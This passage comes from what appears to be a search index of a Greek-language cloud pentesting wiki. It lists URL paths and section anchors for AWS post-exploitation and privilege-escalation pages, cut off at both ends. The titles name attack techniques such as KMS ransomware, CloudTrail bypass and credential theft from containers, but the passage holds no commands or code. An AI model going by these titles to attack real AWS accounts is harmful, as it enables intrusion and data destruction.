-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Έλεγχος-ενός-snapshot-τοπικά","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Έλεγχος-ενός-snapshot-στο-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#Έλεγχος-ενός-snapshot-στο-aws-χρησιμοποιώντας-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---malicious-vpc-mirror","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#Σύνδεση-Λήψη--Αποστολή","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#host-iam-roles","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-to-node-to-steal-other-containers-creds--secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#Κλοπή-ευαίσθητων-πληροφοριών-από-κοντέινερ-ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-και-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Εντοπισμός-του-cluster-από-την-κονσόλα-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Σύνδεση-με-το-aws-kubernetes-cluster","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Από-το-aws-στο-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Από-το-kubernetes-στο-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Λάβετε-το-api-server-endpoint-από-ένα-jwt-token","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#Παράκαμψη-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks-Λύτρα","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#Πρόβλημα-Μπερδεμένου-Αναπληρωτή","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#Απροσδόκητες-Εμπιστοσύνες","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#Αναφορές","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#ΚρυπτογράφησηΑποκρυπτογράφηση-πληροφοριών","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#generic-kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#destroy-keys","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#Κλοπή-Αιτημάτων-url-Άλλων-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#Κλοπή-Αιτημάτων-url-Άλλων-lambda--Αιτημάτων-Επεκτάσεων","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---Κλοπή-Αιτημάτων-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Ροή-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Κλοπή-Αιτημάτων-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Βήματα-Επίθεσης","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#Αναφορές","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Επαναφορά-παλαιών-στιγμιότυπων-db","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Επαναφορά-Στιγμιότυπων-instance","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#Πρόσβαση-σε-Ευαίσθητες-Πληροφορίες","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#aws---Οργανώσεις-Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#Οργανώσεις","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#Αποχώρηση-από-την-Οργάνωση","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#Ευαίσθητες-Πληροφορίες","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#pivoting","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#read-secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-change-secret-value","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-Αλλαγή-κλειδιού-kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-Διαγραφή-Μυστικού","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#Διακοπή-Μηνυμάτων","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe--snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource--snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso--identitystore-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso--identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---step-functions-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#Από-iam-creds-σε-Κονσόλα","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#Παράκαμψη-περιορισμών-user-agent-από-python","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws-privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#tools","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestackand-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#Συλλογή-διαπιστευτηρίων-από-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-Ανάλυση","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#Αυτόματα-Εργαλεία","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---directory-services-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-και-προαιρετικά-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#post-exploitation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-Διαβάστε-δεδομένα-εκμεταλλευόμενοι-τα-data-streams","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration-autoscalingcreateautoscalinggroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#Αναφορές","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-άδειες-εγγραφής-s3--πολλές-άλλες","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-και-άλλα","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasti